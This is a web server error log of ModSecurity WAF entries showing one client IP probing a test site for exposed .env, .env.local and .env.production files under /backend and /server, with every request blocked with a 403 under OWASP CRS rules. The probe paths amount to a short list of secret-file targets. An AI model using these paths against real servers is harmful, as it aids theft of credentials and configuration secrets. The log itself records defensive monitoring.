[Fri Jan 16 03:21:49.139392 2026] [:error] [pid 1444040] [client 45.148.10.246:51644] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env/"] [unique_id "aWmgvfn_5sIyKhJ5GAza9wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env/
[Fri Jan 16 03:21:49.139559 2026] [:error] [pid 1444040] [client 45.148.10.246:51644] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env/"] [unique_id "aWmgvfn_5sIyKhJ5GAza9wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env/
[Fri Jan 16 03:21:49.259545 2026] [:error] [pid 1444031] [client 45.148.10.246:51646] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvX-9MmrgwjmYTAJT6wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env
[Fri Jan 16 03:21:49.259785 2026] [:error] [pid 1444031] [client 45.148.10.246:51646] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvX-9MmrgwjmYTAJT6wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env
[Fri Jan 16 03:21:49.259938 2026] [:error] [pid 1444031] [client 45.148.10.246:51646] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvX-9MmrgwjmYTAJT6wAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env
[Fri Jan 16 03:21:49.398594 2026] [:error] [pid 1444035] [client 45.148.10.246:60722] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvbauW6yeGWXfDeFYkQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env
[Fri Jan 16 03:21:49.398821 2026] [:error] [pid 1444035] [client 45.148.10.246:60722] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvbauW6yeGWXfDeFYkQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env
[Fri Jan 16 03:21:49.398980 2026] [:error] [pid 1444035] [client 45.148.10.246:60722] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aWmgvbauW6yeGWXfDeFYkQAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env
[Fri Jan 16 03:21:49.563491 2026] [:error] [pid 1444033] [client 45.148.10.246:60726] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvdLJkp65ULFQ2YYjPwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.local
[Fri Jan 16 03:21:49.563710 2026] [:error] [pid 1444033] [client 45.148.10.246:60726] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvdLJkp65ULFQ2YYjPwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.local
[Fri Jan 16 03:21:49.563870 2026] [:error] [pid 1444033] [client 45.148.10.246:60726] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvdLJkp65ULFQ2YYjPwAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.local
[Fri Jan 16 03:21:49.722798 2026] [:error] [pid 1444034] [client 45.148.10.246:60740] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local/"] [unique_id "aWmgveRfEYyDES-ZFL4izwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.local/
[Fri Jan 16 03:21:49.723024 2026] [:error] [pid 1444034] [client 45.148.10.246:60740] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local/"] [unique_id "aWmgveRfEYyDES-ZFL4izwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.local/
[Fri Jan 16 03:21:49.723193 2026] [:error] [pid 1444034] [client 45.148.10.246:60740] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local/"] [unique_id "aWmgveRfEYyDES-ZFL4izwAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.local/
[Fri Jan 16 03:21:49.914520 2026] [:error] [pid 1444226] [client 45.148.10.246:60750] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvWcpoCUgeFICb0bgNwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env.local
[Fri Jan 16 03:21:49.914775 2026] [:error] [pid 1444226] [client 45.148.10.246:60750] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvWcpoCUgeFICb0bgNwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env.local
[Fri Jan 16 03:21:49.914929 2026] [:error] [pid 1444226] [client 45.148.10.246:60750] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvWcpoCUgeFICb0bgNwAAAAY"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env.local
[Fri Jan 16 03:21:50.044552 2026] [:error] [pid 1444040] [client 45.148.10.246:60752] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvvn_5sIyKhJ5GAza-AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env.local
[Fri Jan 16 03:21:50.044780 2026] [:error] [pid 1444040] [client 45.148.10.246:60752] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvvn_5sIyKhJ5GAza-AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env.local
[Fri Jan 16 03:21:50.044949 2026] [:error] [pid 1444040] [client 45.148.10.246:60752] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.local"] [unique_id "aWmgvvn_5sIyKhJ5GAza-AAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env.local
[Fri Jan 16 03:21:50.260216 2026] [:error] [pid 1444031] [client 45.148.10.246:60762] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvn-9MmrgwjmYTAJT7AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.production
[Fri Jan 16 03:21:50.260491 2026] [:error] [pid 1444031] [client 45.148.10.246:60762] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvn-9MmrgwjmYTAJT7AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.production
[Fri Jan 16 03:21:50.260656 2026] [:error] [pid 1444031] [client 45.148.10.246:60762] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvn-9MmrgwjmYTAJT7AAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.production
[Fri Jan 16 03:21:50.412513 2026] [:error] [pid 1444035] [client 45.148.10.246:60774] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production/"] [unique_id "aWmgvrauW6yeGWXfDeFYkgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.production/
[Fri Jan 16 03:21:50.412757 2026] [:error] [pid 1444035] [client 45.148.10.246:60774] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production/"] [unique_id "aWmgvrauW6yeGWXfDeFYkgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.production/
[Fri Jan 16 03:21:50.412913 2026] [:error] [pid 1444035] [client 45.148.10.246:60774] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production/"] [unique_id "aWmgvrauW6yeGWXfDeFYkgAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/backend/.env.production/
[Fri Jan 16 03:21:50.633019 2026] [:error] [pid 1444033] [client 45.148.10.246:60788] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvtLJkp65ULFQ2YYjQAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env.production
[Fri Jan 16 03:21:50.633243 2026] [:error] [pid 1444033] [client 45.148.10.246:60788] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvtLJkp65ULFQ2YYjQAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env.production
[Fri Jan 16 03:21:50.633403 2026] [:error] [pid 1444033] [client 45.148.10.246:60788] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvtLJkp65ULFQ2YYjQAAAAAI"], referer: http://economiasolidale.test.indacotrentino.com//backend/.env.production
[Fri Jan 16 03:21:50.766655 2026] [:error] [pid 1444034] [client 45.148.10.246:60800] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvuRfEYyDES-ZFL4i0AAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env.production
[Fri Jan 16 03:21:50.766896 2026] [:error] [pid 1444034] [client 45.148.10.246:60800] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvuRfEYyDES-ZFL4i0AAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env.production
[Fri Jan 16 03:21:50.767061 2026] [:error] [pid 1444034] [client 45.148.10.246:60800] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env.production"] [unique_id "aWmgvuRfEYyDES-ZFL4i0AAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/./backend/.env.production
[Fri Jan 16 03:21:50.929997 2026] [:error] [pid 1444226] [client 45.148.10.246:60812] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgvmcpoCUgeFICb0bgOAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/server/.env
[Fri Jan 16 03:21:50.930229 2026] [:error] [pid 1444226] [client 45.148.10.246:60812] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgvmcpoCUgeFICb0bgOAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/server/.env
[Fri Jan 16 03:21:50.930413 2026] [:error] [pid 1444226] [client 45.148.10.246:60812] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgvmcpoCUgeFICb0bgOAAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/server/.env
[Fri Jan 16 03:21:51.099553 2026] [:error] [pid 1444040] [client 45.148.10.246:60818] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env/"] [unique_id "aWmgv_n_5sIyKhJ5GAza-QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/server/.env/
[Fri Jan 16 03:21:51.099782 2026] [:error] [pid 1444040] [client 45.148.10.246:60818] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env/"] [unique_id "aWmgv_n_5sIyKhJ5GAza-QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/server/.env/
